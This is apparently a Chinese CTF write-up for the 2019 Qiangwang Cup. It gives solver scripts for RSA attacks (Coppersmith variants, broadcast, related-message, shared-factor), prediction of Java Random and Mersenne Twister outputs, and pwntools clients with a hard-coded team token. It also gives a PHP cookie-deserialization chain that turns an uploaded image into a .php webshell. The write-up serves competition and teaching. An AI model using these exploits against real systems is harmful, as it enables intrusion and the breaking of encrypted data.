2019 强网杯 wp

Crypto

COPPERSTUDY

俄罗斯套娃一样的题目,和去年一样,今年是考 Coppersmith 相关攻击,主要参考ctf wiki https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/#known-high-bits-message-attack

github:https://github.com/mimoo/RSA-and-LLL-attacks

第一关:

已知明文的高位,低72位不知道,从https://github.com/mimoo/RSA-and-LLL-attacks 这里找的脚本,改的脚本如下:

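# Stage 1 (Sage): RSA with e = 3 where the high bits of the plaintext are
# known and only the low Kbits bits are missing.  The unknown part is modelled
# as a small root x of (part_m + x)^e - C modulo N.
# coppersmith_howgrave_univariate() is not defined in this listing; it comes
# from the RSA-and-LLL-attacks script referenced in the surrounding text.
N=0x8d28bda1fbb8190dd9f530c6c8b388f74749a2a957092bef9bb0d3439950aa22cb1638dd09eee5e08fb5da22d5d063f69b7e2aa087041eea9c9d78440e2abc0b9f5c922f30d69a2bce2416df4f9c5383adac8e933bd10c6cf56352db8e46cc65fc5b8109def1f91d553610a3b05e8c0f66d917c4c47fc04297b8e1817cf84dL
length_N = 1016
e=3
Kbits = 72
ZmodN = Zmod(N)
C=0x57916d30c7568749b98f0f688bf80c2cd0d3394039b4b3485aa6c094a269f13ee0dec44bc03c5ce5ff2e43384252f3ea658a88f8fc3e90dd022da6842579a6fc1e0adf19323c1188647845b9b938b7610684bab06eae88e40892aaea5503bc1ea5066a4cfc69c08c576d08fa69f28c888afb94b0dd882acd45c6ace2bc49c4L
# Known high part of the message; the low Kbits bits are zeroed out.
part_m=0x81db7350876267d03e36e3dd70129e08167e715c6508ac4ee1afbd4992ad0ac8a5021ab1c084f8b087ab72a155989816a263213d62449000000000000000000L
P.<x> = PolynomialRing(ZmodN) #, implementation='NTL')
pol = (part_m + x)^e - C
dd = pol.degree()

# Lattice parameters, kept as in the referenced script.
beta = 1 # b = N
epsilon = beta / 7 # <= beta / 7
mm = ceil(beta**2 / (dd * epsilon)) # optimized value
tt = floor(dd * mm * ((1/beta) - 1)) # optimized value
XX = ceil(N**((beta**2/dd) - epsilon))

roots = coppersmith_howgrave_univariate(pol, N, beta, mm, tt, XX)
# The helper can come back empty; fail with a clear message instead of an
# IndexError on roots[0].
if not roots:
    raise ValueError("no small root found for the given parameters")

result=part_m+roots[0]
# Confirm the candidate really encrypts to C before it is used as an answer.
if ZZ(pow(ZZ(result), e, N)) != ZZ(C):
    raise ValueError("recovered value does not match the ciphertext")
##result=425073431519458914714078012425419177266636080842324683032155837727713301740606335541361888317818841093831762175806435562415181409265511020138003062793538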

第二关:

已知 p 高位攻击,xman 排位赛靠这题翻盘的。。直接拿脚本来用:

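# Stage 2 (Sage): factor n when the leading bits of the prime p are known.
# pp holds the known leading bits; the loop guesses 9 further bits and asks
# small_roots() for the remaining low bits of p.
n=0x372d81ecfff69fcb7317e7c0190d03e7f0a4ba85aeee3d98a13286a4b3914a0f5503c3a422b6f7e673c4008b0e77b2fc02c26b47fba10b2b5a2079dbc6402becc7175846854b0f5b0186b3b723b3b82c99ac57bdde624c9bb1b40fde1ffbdede598355ad3c8db3b92eda266b8fa6487bab3b07dfaf6ea27aa55384816f1c6cfdL
pp = 0x84ff948225107a552a08aea00214eb9f7f97d9dcafa08d04840bebfc5bea2e05b95153f19e79dea79b1486421ed747ca
e = 0x10001
c=0xf90f4099336dc4dee753268e2aadf57211415f8fd307829702eef202dc0b5c11d5c8e4627cf90c57d23b4e3ac545aef20773fa9f21a2c49a71bcda715452b0ab62c9b36a7c838868d0e229eede374bff33a7defc1a229a45a1e568cb8e8031e8a8d5a1e36268b5732024fa3b13d77eb33425bf812de98abc7934295041e1367L
pbits=512
# The ring does not depend on the guess, so build it once.
PR.<x> = PolynomialRing(Zmod(n))
for b in range(0,2**9):
    # Known prefix followed by the 9 guessed bits, then shifted up so the
    # candidate is pbits long with kbits unknown low bits.
    p = (pp << 9) + b
    kbits = pbits - p.nbits()
    p = p << kbits
    f = x + p
    roots = f.small_roots(X=2^kbits, beta=0.4)
    # An empty list just means this guess is wrong; test for it explicitly
    # rather than hiding every possible error behind a bare except.
    if not roots:
        continue
    p2 = int(p + roots[0])
    # Only accept a candidate that actually divides n.
    if p2 <= 1 or n % p2 != 0:
        continue
    q = n // p2
    print "p:",p2
    print "q:",q
    phin = (p2-1)*(q-1)
    break
else:
    print "no factor found for any 9-bit guess"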

第三关:

已知d低位,找脚本跑:https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%89coppersmith-%E7%9B%B8%E5%85%B3/

这里坑了很久:题目给的 d 低位是 512 位,直接跑脚本总是报错,之后才发现是给的位数太多,代码里有个数变成了负数(应该是 partial_p 中 small_roots 的上界 X=2^(nbits//2-kbits) 的指数,kbits 过大时会小于 0)…

image.png

我改成了利用后500位,就好了:

def partial_p(p0, kbits, n):
    """Try to complete a prime factor of n from its low kbits bits p0.

    Models the factor as 2^kbits*x + p0, makes the polynomial monic over
    Zmod(n) and asks small_roots() for x below 2^(nbits//2 - kbits).
    Returns the factor as an integer (via gcd with n), or None when
    small_roots() finds nothing.

    NOTE(review): the bound exponent nbits//2 - kbits is not checked here;
    the accompanying text reports errors when kbits was chosen too large.
    """
    PR.<x> = PolynomialRing(Zmod(n))
    half_bits = n.nbits() // 2
    poly = (2^kbits*x + p0).monic()
    # find root < 2^(nbits//2-kbits) with factor >= n^0.3
    candidates = poly.small_roots(X=2^(half_bits-kbits), beta=0.3)
    if not candidates:
        return None
    return ZZ(gcd(2^kbits*candidates[0] + p0, n))

def find_p(d0, kbits, e, n):
    """Search for a prime factor of n given d0, the low kbits bits of d.

    For every k in 1..e, solves the congruence below modulo 2^kbits for X
    and hands each solution to partial_p() as a candidate for the low bits
    of p.  Returns the first factor partial_p() reports, or None if no
    candidate works.
    """
    X = var('X')
    modulus = 2^kbits
    for k in xrange(1, e+1):
        congruence = e*d0*X - k*X*(n-X+1) + k*n == X
        for solution in solve_mod([congruence], modulus):
            factor = partial_p(ZZ(solution[0]), kbits, n)
            if factor:
                return factor
    return None


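if __name__ == '__main__':
    # Stage 3 data: modulus, public exponent and the given low bits of d.
    n=0x77789924c9cee176e8f9ae4a40d29c0a61891d67fc825b6e1570e980a8cb275f138d5f6e118eff6f76673b382cfaaa4f4a9c204ee30d7c887a5c70197bc2701f7f61da8c65e6972398d2842faa51d3274ee99716e56fba888a91263b5e7986363b75c82a86fc9a964aa65b03ede04b4ae0dfb6f96a7fb928e04d092d782148d
    e = 3
    d = 0x4bf6610df9dd72df11b3c273d8795b7765374a73e1f3e18abb0af883e1d546cc2fca3ab53e5b18baa228053972472d23e87f411e1f2781faa89ede9bc09b4d53
    nbits = n.nbits()
    # Only the low 500 bits are used; the text explains that using all the
    # given bits made the script fail.
    kbits = 500
    d0 = d & (2^kbits-1)
    print "lower %d bits (of %d bits) is given" % (kbits, nbits)

    p = find_p(d0, kbits, e, n)
    # find_p() returns nothing when no candidate works; stop with a clear
    # message instead of a TypeError in the format string below.
    if not p:
        raise ValueError("no factor of n found from the given low bits of d")
    print "found p: %d" % p
    q = n//p
    # Print the given partial d next to the recomputed full d for comparison.
    print d
    print inverse_mod(e, (p-1)*(q-1))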

第四关:

广播攻击,脚本:

# -*- coding: utf-8 -*-
from gmpy2 import *
from Crypto.Util.number import *
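def GCRT(mi, ai):
    """Solve the congruences x = ai[k] (mod mi[k]) by the generalized CRT.

    mi is the list of moduli and ai the list of residues.  The moduli do not
    have to be pairwise coprime.  Returns the pair (x, M) where M is the
    combined modulus and 0 <= x < M.  An AssertionError is raised when the
    arguments are not lists or the system has no solution.
    """
    # mi and ai are the moduli and the residues; both must be lists
    assert (isinstance(mi, list) and isinstance(ai, list))
    curm, cura = mi[0], ai[0]
    for (m, a) in zip(mi[1:], ai[1:]):
        d = gcd(curm, m)
        c = a - cura
        assert (c % d == 0)  # otherwise the system has no solution
        # Every division here is exact, so use floor division: it keeps the
        # values integral regardless of how "/" is defined for the operands.
        K = c // d * invert(curm // d, m // d)
        cura += curm * K
        curm = curm * m // d
    # The listing lost this return; the caller unpacks two values.
    return (cura % curm, curm)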
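# Stage 4 data: three moduli and three ciphertexts with e = 3 (the text calls
# this the broadcast attack).
n2=0x3d9e0e106474d42db39ba27c96cf830737ee86ee77ff03298f1f0460612e9488e7ad402a1f2aacef1a13c4cf75b457e9957f798fcfdb2d510af2a6fceab71cd64c717df829e755bf8573edda4e98269da9eaf6e89c1c656970c7e1dbf9c0a39b4efcb64c9ba805cc8b22ab90022491abea03cc03ac6a6aabcaa210c30ac00f5fL
c1=0x64f9355e681326771f3fdd7d07c46cf493dfd7199b9b16b2d33493c3afd33ef4f35184b75de30e27ab452d3addc2f81e9547d9cb061e9f14396e7387e43e637f2004cc83ad81c0930c144d8587e25330290e808c79730db770934ea034a00223f674a484a0efa0df2d2b649fce492facaa79a6aa9344dd4b5b6e02915c40008aL
n1=0x7f084b13487e7e0f2e9d6976cb41e825e0dac9bf13a5712bd1610b17b5c1cec51fe98938f5d4e73e6b9af2f92b95383ed39c6a0be779fdf3275a059e55014bbe4c4dd337b72db18e704d5bbe291d06d9c1b263cdb7719ccd6cf57d812a2a54f369696d04c166617f56b3010e07f98354d05e9116add4281edee2ac32f70fb317L
c2=0xf8f04645ea1d7f3aaaea76a17ad8c20c1483c457135d5a29721d11f206fb2b7e17293f0c0b5be7eaf55f1917367881a2c3403b319a22a53336ee4848b6d255e4e26df500ca54c6317611ac1181a739288362a6084a53342032517ea2b623d332264571003af203c9cd2e8269a9933dfacaf50442f298d99d699d3e4c3511bc9L
n3=0x6e24ae9edc6e30e5ed4fd5982914bf0d4cba5695a47752858d057f0c20ffc9de7471bea76ac4bd336b51cafc7aeb24f3f76bab3e0ede10b214b1c68584db0abf4c9854ae98ffabb01b503f76604b8dead5520e1c3e6750be75580b683e4630c1f6b5e0575e8be9ecd6a68e16dc1fbb3f60fbb0159ee951c8a858cf6a66d83a53L
c3=0x4cf28e0b122c9727cff60c7d71192573c231673cd7742ba18e9e5d391a346bc470e693a308ca65454913569f3d0e5f0f15c62afa2285644fc5b9919c22e87ca8f746eec9cff7b1e97761ae3145e3c007acc603928e3c04d47067c2325070cbdea41c6fca21665eb186f26e3e275c456427bf7da1b5bd325eac16c2710ff5102eL
e=3
# Combine the residues into one value modulo n1*n2*n3.
C,N=GCRT([n1,n2,n3],[c1,c2,c3])
# iroot() also reports whether the root is exact; an inexact root means the
# combined value is not a perfect e-th power and the result would be garbage.
m, exact = iroot(C, e)
if not exact:
    raise ValueError("combined value is not a perfect e-th power")
print long_to_bytes(m).encode("hex")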

第五关:

Related Message Attack,代码:

# -*- coding: utf-8 -*-
from gmpy2 import *
from Crypto.Util.number import *
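def getmessage(a, b, c1, c2, n):
    """Recover M from two e = 3 ciphertexts of linearly related messages.

    Expects c2 = M^3 mod n and c1 = (a*M + b)^3 mod n and returns
        M = b*(c1 + 2*a^3*c2 - b^3) / (a*(c1 - a^3*c2 + 2*b^3))  mod n.
    The a^3 factors are included so the result is also right for a != 1;
    for a = 1 the value is the same as before.  invert() raises
    ZeroDivisionError when the denominator has no inverse modulo n.
    """
    a3 = powmod(a, 3, n)
    b3 = powmod(b, 3, n)
    numerator = b * (c1 + 2 * a3 * c2 - b3) % n
    denominator = a * (c1 - a3 * c2 + 2 * b3) % n
    return (numerator * invert(denominator, n)) % n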
# Stage 5 data: one modulus and two ciphertexts of related messages, e = 3.
n=0x4050e234e683b2527380ea84d391151be80831abcd540f3467a31511d708b0be459725b39581a3d4edcffa856f31b1eca19a37b7e7c34e378bb3ed7e660b4a19d24769497d26aea09eab0e2a2849d006cb4b1f61b6b7ee4c3ec3fc58383e3c6eb2fcfbe9c36343bfe74fec5e952e477bd4493f01a0a81092d680a776b1a555e7L
c1=0x3fa7da49d8cbc6fe46bf15b9c35107fc0fe043eb3c94c1b6f214bf3943ed5310cb92e8aea576c6074a518f9a5b7d3de535158146ed3a74a298d98f55712359e795f1e83f253c61344617c5e35933c902fd49e50f37dbac51c23f2a0b954247b8af376444faca957db97f94b42dda469acfc5aab7574a486f6e326bfee0aa420dL
c2=0x3edc18248feddad66f95550e3ec77d1de26dd9236824d049587aa567fa52e9290dee4416c78c39adda36b6eb1169df42b68a5cebdb07a784223c07680c3cd64c19f9fb7483d5ab7cd6d7bebf07ae0da0ee91557d9f1bbcbc8b9f7362f37050d718dca8fbd8749ab7dad7a531876fb3db988f3598ed6ce7c9d32102986a68a9a1L
e=3
# The two ciphertexts are passed in swapped order, with a = b = 1.
recovered = getmessage(1,1,c2,c1,n)
print long_to_bytes(recovered).encode("hex")

第六关:

Boneh and Durfee attack,从https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage上改的。

最终exp:

from pwn import *
import string
from hashlib import sha256
import itertools
# pwntools debug logging, so the exchanged data shows up in the log.
context.log_level = "debug"

# Search alphabet for the proof of work: all 256 single-byte values.
# NOTE(review): this name shadows the builtin `dict`; Pow() reads it as a
# global, so it cannot be renamed in this statement alone.
dict = list(map(chr, range(256)))
# NOTE(review): a team token hard-coded in a published script; a credential
# like this is better read from the environment or a local config file.
token = '35561ebb6d2cd5f8f6dddd1c1f60b613'

def Pow(part_hex,hash_value):
    """Solve the service's proof of work.

    part_hex is the hex-encoded known prefix and hash_value the expected
    SHA-256 hex digest.  Tries every 3-byte suffix drawn from the global
    `dict` and returns the hex encoding of prefix + suffix once the digest
    matches; returns None if no suffix matches.
    """
    prefix = part_hex.decode("hex")
    for suffix in itertools.product(dict, repeat=3):
        candidate = prefix + ''.join(suffix)
        if sha256(candidate).hexdigest() != hash_value:
            continue
        print "success"
        return candidate.encode("hex")
# Connect to the challenge service and walk through its prompts in order.
# The statement order mirrors the server's dialogue and must not be changed.
r=remote("119.3.245.36",12345)
r.recv()
# Proof-of-work prompt: read the 64-character digest and the 10-character
# hex prefix the server prints.
r.recvuntil(".hexdigest()=")
hash_value=r.recv(64)
r.recvuntil(".encode('hex')=")
part_hex=r.recv(10)
print hash_value,part_hex
# NOTE(review): Pow() returns None when no suffix matches; that case is not
# handled before sendline().
result=Pow(part_hex,hash_value)
r.recv()
r.sendline(result)
r.sendlineafter('teamtoken:',token)
r.recvuntil("Generating challenge 1\n")
r.recv()
r.recv()
# Hex answers sent one per stage; presumably the values produced by the
# stage scripts above — confirm.
r.sendline("081db7350876267d03e36e3dd70129e08167e715c6508ac4ee1afbd4992ad0ac8a5021ab1c084f8b087ab72a155989816a263213d624490a8888766ecc472542")
r.sendlineafter("encode('hex')=","21d2ce15ce3916a5e3b661de35d132dc32bac36de0e8288baa7a1a36207e6e54b643e701445398fee048b0912090996b5924bf36e5765334ef1029eb05ac128e")
r.sendlineafter("encode('hex')=","0a56f8eff78995a1a80369469acbfa87b8d17c6918bff28246a6a9c0ffa6875b2f33b3399326b6929e49c22bbba63f71b04b0d45a7b1ac808f5dff41475ae5d5")
r.sendlineafter("encode('hex')=","0f30aba3355b7ead17f6768158fff2ccdc6e66f8123bb283864e70629bfe0db705b68e299e337c3a4ce1596d880b72689bfab8d066e568b00998ad13330f3dad")
r.sendlineafter("encode('hex')=","499f89d02d2d95427229d369d86d26063465523c49176ffed8786cc7b258cb647f79512cbb9ecab746d8f322f42ae6fd71362ee6e9e6086c34865d626cbab2da")
r.sendlineafter("encode('hex')=","6b3bb0cdc72a7f2ce89902e19db0fb2c0514c76874b2ca4113b86e6dc128d44cc859283db4ca8b0b5d9ee35032aec8cc8bb96e8c11547915fc9ef05aa2d72b28")
# Wait for the next prompt; the listing ends here (the sixth-stage answer is
# not shown being sent).
r.recvuntil("encode('hex')=")

image.png

RANDOMSTUDY

第一关,仿照服务器生成种子的时间,这边也生成个大概的时间,爆破:

第二关,java random nextint 可以通过生成的两个数来预测种子,java文件在这里:https://github.com/fta2012/ReplicatedRandom/blob/master/ReplicatedRandom.java

简单改一下java文件:

import java.util.ArrayList;
import java.util.Random;

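/**
 * A java.util.Random whose internal state can be set to match another Random
 * instance from a small number of that instance's outputs.
 *
 * The recovery works because each output exposes the upper bits of the 48-bit
 * generator state (see the comments in replicateState below), leaving only a
 * few bits to search. This is why values that must be unpredictable should
 * come from java.security.SecureRandom rather than java.util.Random.
 */
public class ReplicatedRandom extends Random {
    /** Replicate the state of a Random using a single value from its nextDouble. */
    public boolean replicateState(double nextDouble) {
        // nextDouble() is generated from ((next(26) << 27) + next(27)) / (1L << 53)
        // Inverting those operations will get us the values of next(26) and next(27)
        long numerator = (long)(nextDouble * (1L << 53));
        int first26 = (int)(numerator >>> 27);
        int last27 = (int)(numerator & ((1L << 27) - 1));
        return replicateState(first26, 26, last27, 27);
    }

    /** Replicate the state of a Random using a single value from its nextLong. */
    public boolean replicateState(long nextLong) {
        int last32 = (int)(nextLong & ((1L << 32) - 1));
        int first32 = (int)((nextLong - last32) >> 32);
        return replicateState(first32, 32, last32, 32);
    }

    /** Replicate the state of a Random using two consecutive values from its nextInt. */
    public boolean replicateState(int firstNextInt, int secondNextInt) {
        return replicateState(firstNextInt, 32, secondNextInt, 32);
    }

    /** Replicate the state of a Random using two consecutive values from its nextFloat. */
    public boolean replicateState(float firstNextFloat, float secondNextFloat) {
        return replicateState((int)(firstNextFloat * (1 << 24)), 24, (int)(secondNextFloat * (1 << 24)), 24);
    }

    /**
     * Replicate the state from the results of two consecutive calls next(n)
     * and next(m).
     *
     * @param nextN value returned by next(n)
     * @param n     number of bits of the first value
     * @param nextM value returned by next(m)
     * @param m     number of bits of the second value
     * @return true when exactly one candidate seed was found and installed;
     *         false otherwise (a diagnostic is printed to standard output)
     */
    public boolean replicateState(int nextN, int n, int nextM, int m) {
        // Constants copied from java.util.Random
        final long multiplier = 0x5DEECE66DL;
        final long addend = 0xBL;
        final long mask = (1L << 48) - 1;

        long upperMOf48Mask = ((1L << m) - 1) << (48 - m);

        // next(x) is generated by taking the upper x bits of 48 bits of (oldSeed * multiplier + addend) mod (mask + 1)
        // So now we have the upper n and m bits of two consecutive calls of next(n) and next(m)
        long oldSeedUpperN = ((long)nextN << (48 - n)) & mask;
        long newSeedUpperM = ((long)nextM << (48 - m)) & mask;

        // Bruteforce the lower (48 - n) bits of the oldSeed that was truncated.
        // Calculate the next seed for each guess of oldSeed and check if it has the same top m bits as our newSeed.
        // If it does then the guess is right and we can add that to our candidate seeds.
        ArrayList<Long> possibleSeeds = new ArrayList<Long>();
        for (long oldSeed = oldSeedUpperN; oldSeed <= (oldSeedUpperN | ((1L << (48 - n)) - 1)); oldSeed++) {
            long newSeed = (oldSeed * multiplier + addend) & mask;
            if ((newSeed & upperMOf48Mask) == newSeedUpperM) {
                possibleSeeds.add(newSeed);
            }
        }

        if (possibleSeeds.size() == 1) {
            // If there's only one candidate seed, then we found it!
            // setSeed(x) sets seed to `(x ^ multiplier) & mask`, so we need another `^ multiplier` to cancel it out
            setSeed(possibleSeeds.get(0) ^ multiplier);
            return true;
        }
        if (possibleSeeds.size() >= 1) {
            System.out.println("Didn't find a unique seed. Possible seeds were: " + possibleSeeds);
        } else {
            System.out.println("Failed to find seed!");
        }
        return false;
    }

    /**
     * Command-line entry point: takes two consecutive nextInt() values and
     * prints the value that follows them.
     *
     * Exits with a non-zero status, without printing a prediction, when the
     * arguments are missing or the state could not be recovered. Previously
     * a failed recovery still printed a number from an unrelated state.
     */
    public static void main(String[] args) {
        if (args.length != 2) {
            System.err.println("usage: java ReplicatedRandom <firstNextInt> <secondNextInt>");
            System.exit(2);
        }
        int i1 = Integer.parseInt(args[0]);
        int i2 = Integer.parseInt(args[1]);
        ReplicatedRandom rr = new ReplicatedRandom();
        if (!rr.replicateState(i1, i2)) {
            System.exit(1);
        }
        System.out.println(rr.nextInt());
    }
}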

编译一下java文件,这样我们就可以通过python的subprocess调用class文件了,再把运行的结果获取到。

第三关:可以通过生成的随机数序列来预测,参考:https://github.com/kmyk/mersenne-twister-predictor

最终exp:

from pwn import *
import itertools
from hashlib import sha256
import random
import subprocess
from mt19937predictor import MT19937Predictor

# pwntools debug logging, so the exchanged data shows up in the log.
context.log_level = "debug"

# Search alphabet for the proof of work: all 256 single-byte values.
# NOTE(review): this name shadows the builtin `dict`; Pow() reads it as a
# global, so it cannot be renamed in this statement alone.
dict = list(map(chr, range(256)))
# NOTE(review): a team token hard-coded in a published script; a credential
# like this is better read from the environment or a local config file.
token = '35561ebb6d2cd5f8f6dddd1c1f60b613'

def Pow(part_hex,hash_value):
    """Solve the service's proof of work.

    part_hex is the hex-encoded known prefix and hash_value the expected
    SHA-256 hex digest.  Tries every 3-byte suffix drawn from the global
    `dict` and returns the hex encoding of prefix + suffix once the digest
    matches; returns None if no suffix matches.
    """
    prefix = part_hex.decode("hex")
    for suffix in itertools.product(dict, repeat=3):
        candidate = prefix + ''.join(suffix)
        if sha256(candidate).hexdigest() != hash_value:
            continue
        print "success"
        return candidate.encode("hex")

# Connect, pass the proof of work and send the team token.  The statement
# order mirrors the server's dialogue and must not be changed.
r=remote("119.3.245.36",23456)
r.recv()
r.recvuntil(".hexdigest()=")
hash_value=r.recv(64)
r.recvuntil(".encode('hex')=")
part_hex=r.recv(10)
print hash_value,part_hex
# NOTE(review): Pow() returns None when no suffix matches; that case is not
# handled before sendline().
result=Pow(part_hex,hash_value)
r.sendline(result)
r.sendlineafter('teamtoken:',token)
r.recvuntil('Generating challenge 1')
# Local clock at the moment stage 1 starts, used as the first seed guess.
# NOTE(review): `time` is not imported in this listing; presumably it comes
# in through `from pwn import *` — confirm.
base=int(time.time())

def challenge1(base):
    # Stage 1: the text says the server seeds its generator from the time, so
    # the script seeds Python's `random` with a nearby timestamp and replays
    # it.  A generator seeded from the clock has only a handful of plausible
    # seeds, which is why such values should come from `os.urandom`/`secrets`.
    # NOTE(review): the page lost its indentation; the nesting below (in
    # particular `base=base-1` inside the outer loop) is reconstructed —
    # confirm against the original script.
    for i in range(200):
        random.seed(base)
        # Advance the generator i+1 times; only the last value is kept.
        for j in range(i+1):
            data=random.randint(0,2**64)
        r.recvuntil("[-]",timeout=1)
        r.sendline(str(data))
        if "completed" in r.recv():
            return
        # Try the previous second on the next attempt.
        base=base-1
challenge1(base)

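def challenge2():
    """Stage 2: answer with the value ReplicatedRandom prints.

    Reads two values from the server, passes them to the compiled
    ReplicatedRandom class and sends back what it prints.  When the Java
    helper fails, the placeholder "123" is sent instead so the dialogue
    stays in step.
    """
    for i in range(200):
        r.recvuntil("[-]")
        v1=r.recvuntil("\n").strip()
        r.recvuntil("[-]")
        v2=r.recvuntil("\n").strip()
        try:
            # The server-supplied values go in as separate argv entries (no
            # shell is involved), so they cannot alter the command line.
            o = subprocess.check_output(["/usr/lib/jvm/jdk-12.0.1/bin/java", "ReplicatedRandom",v1,v2])
            result=o.strip()
        except (subprocess.CalledProcessError, OSError):
            # Helper exited non-zero or could not be started.  Catch only
            # these: a bare except would also swallow KeyboardInterrupt and
            # hide unrelated bugs.
            result="123"
        r.sendline(result)
        data=r.recv()
        print "123"+data
        if "completed" in r.recv():
            return
challenge2()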

def challenge3():
    # Stage 3: collect generator outputs that the server reveals after each
    # wrong answer, feed them to the MT19937 predictor, then answer with the
    # predicted next value.  Mersenne Twister output is fully determined by
    # its state, so it must not be used where values have to be
    # unpredictable.
    predictor = MT19937Predictor()
    # 624 outputs of 32 bits each are fed in before predicting.
    for i in range(624):
        # Deliberately wrong answer to make the server print its value.
        r.sendline("123")
        r.recvuntil("[+]failed:")
        data=r.recvuntil("[-]")
        # data[:-4] drops the last four characters, presumably a newline and
        # the "[-]" marker — confirm against the server output.
        predictor.setrandbits(int(data[:-4]), 32)
    result=predictor.getrandbits(32)
    r.sendline(str(result))
    r.recvuntil("flag")
challenge3()

强网先锋——辅助

送分题,两个n算最大公因数:

from gmpy2 import *
from Crypto.Util.number import *

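# Two RSA moduli that share a prime factor: gcd(n1, n2) gives that prime.
n1=14967030059975114950295399874185047053736587880127990542035765201425779342430662517765063258784685868107066789475747180244711352646469776732938544641583842313791872986357504462184924075227433498631423289187988351475666785190854210389587594975456064984611990461126684301086241532915267311675164190213474245311019623654865937851653532870965423474555348239858021551589650169602439423841160698793338115204238140085738680883313433574060243600028500600824624358473403059597593891412179399165813622512901263380299561019624741488779367019389775786547292065352885007224239581776975892385364446446185642939137287519945974807727
n2=14624662628725820618622370803948630854094687814338334827462870357582795291844925274690253604919535785934208081825425541536057550227048399837243392490762167733083030368221240764693694321150104306044125934201699430146970466657410999261630825931178731857267599750324918610790098952520113593130245010530961350592735239454337631927669542026935873535964487595433984902529960726655481696404006628917922241666148082741874033756970724357470539589848548704573091633917869387239324447730587545472564561496724882799495186768858324490838169123077051890332313671220385830444331578674338014080959653201802476516237464651809255679979

p=gcd(n1,n2)
# A gcd of 1 means the moduli share nothing; everything below would then be
# computed from p = 1 and produce a meaningless result.
if p == 1:
    raise ValueError("n1 and n2 have no common factor")
# The division is exact; floor division keeps q an integer however "/" is
# defined for the operands.
q=n1//p
e=65537
c=2482083893746618248544426737023750400124543452082436334398504986023501710639402060949106693279462896968839029712099336235976221571564642900240827774719199533124053953157919850838214021934907480633441577316263853011232518392904983028052155862154264401108124968404098823946691811798952747194237290581323868666637357604693015079007555594974245559555518819140844020498487432684946922741232053249894575417796067090655122702306134848220257943297645461477488086804856018323986796999103385565540496534422406390355987976815450744535949785073009043007159496929187184338592859040917546122343981520508220332785862546608841127597
d=invert(e,(p-1)*(q-1))
print long_to_bytes(pow(c,d,n1))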

Web

upload

www.tar.gz 源码泄露。上传一个图片马,因为后缀名是 png 不能被解析;但 login_check 会对 cookie 直接 unserialize,所以可以利用 cookie 反序列化,把图片马写到 php 后缀的文件里:

image.png

这里filename可控,调用upload_img方法就可以了。

把源码拖下来放到本地web根目录,修改index.php:

<?php
namespace app\web\controller;
use think\Controller;

/**
 * Index controller from the application's leaked source, as it appears in
 * the author's local copy of index.php.
 *
 * login_check() decodes the "user" cookie with unserialize(); the review
 * notes below mark that call and the other places where client-supplied
 * data is trusted.
 */
class Index extends Controller
{
    // Value decoded from the "user" cookie in login_check().
    public $profile;
    // Row loaded from the user table for the ID found in $profile.
    public $profile_db;

    // Landing page: logged-in users are redirected to /home.
    public function index()
    {
        if($this->login_check()){
            // NOTE(review): the redirect target is built from the Host
            // header, which the client controls.
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
            $this->redirect($curr_url,302);
            exit();
        }
        return $this->fetch("index");
    }

    // Home page: shows the upload form until the user has an image.
    public function home(){
        if(!$this->login_check()){
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
            $this->redirect($curr_url,302);
            exit();
        }

        if(!$this->check_upload_img()){
            $this->assign("username",$this->profile_db['username']);
            return $this->fetch("upload");
        }else{
            $this->assign("img",$this->profile_db['img']);
            $this->assign("username",$this->profile_db['username']);
            return $this->fetch("home");
        }
    }

    // Returns 1 when the cookie's profile matches the database row, 0 when
    // it does not, and nothing (null) when the cookie is empty.
    public function login_check(){
        $profile=cookie('user');
        if(!empty($profile)){
            // NOTE(review): the cookie is client-controlled and goes straight
            // into unserialize(), so any class the application can load may
            // be instantiated with attacker-chosen properties. Safer options:
            // unserialize($data, ['allowed_classes' => false]), a JSON
            // payload, or a cookie that is signed and verified first.
            $this->profile=unserialize(base64_decode($profile));
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            // NOTE(review): neither value is checked to be an array before
            // array_diff(); the comparison with null is a loose one.
            if(array_diff($this->profile_db,$this->profile)==null){
                return 1;
            }else{
                return 0;
            }
        }
    }

    // Returns 1 when the stored profile has an image, 0 when it has none,
    // and nothing (null) when no profile has been loaded.
    public function check_upload_img(){
        if(!empty($this->profile) && !empty($this->profile_db)){
            if(empty($this->profile_db['img'])){
                return 0;
            }else{
                return 1;
            }
        }
    }

    // Clears the cookie and redirects to /index.
    public function logout(){
        cookie("user",null);
        $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
        $this->redirect($curr_url,302);
        exit();
    }

    // Reads of undefined properties return an empty string.
    public function __get($name)
    {
        return "";
    }

}
// Lines appended by the write-up's author to the local copy: they build the
// object graph and print it serialized and base64-encoded, the same format
// login_check() reads from the "user" cookie.
// Profile and Register are classes from the leaked application source; they
// are not shown on this page, so the meaning of each property below is taken
// from the surrounding text only.
$test = new Profile();
$test->checker = 0;
$test->except = array('index'=>'upload_img');
$test->ext = 'php';
// Per the text, filename is attacker-controlled and the chain ends in
// upload_img: the uploaded .png path is the source, the .php path the target.
$test->filename_tmp = './upload/08856017fa6b6b422db719c5519123dc/8266e4bfeda1bd42d8f9794eb4ea0a13.png';
$test->filename = './upload/08856017fa6b6b422db719c5519123dc/gml.php';

$a= new Register();
$a->checker = $test;
$a->registed =0;

// NOTE(review): the root cause is the unrestricted unserialize() of the
// cookie; once that is constrained these objects are never instantiated.
$exp = base64_encode(serialize($a));
var_dump($exp);

访问:

image.png

cookie传过去,发现写入成功:

image.png

getflag:

image.png

强网先锋——上单

在log里发现payload:

image.png

打一下:

image.png

getflag:

1558881058312
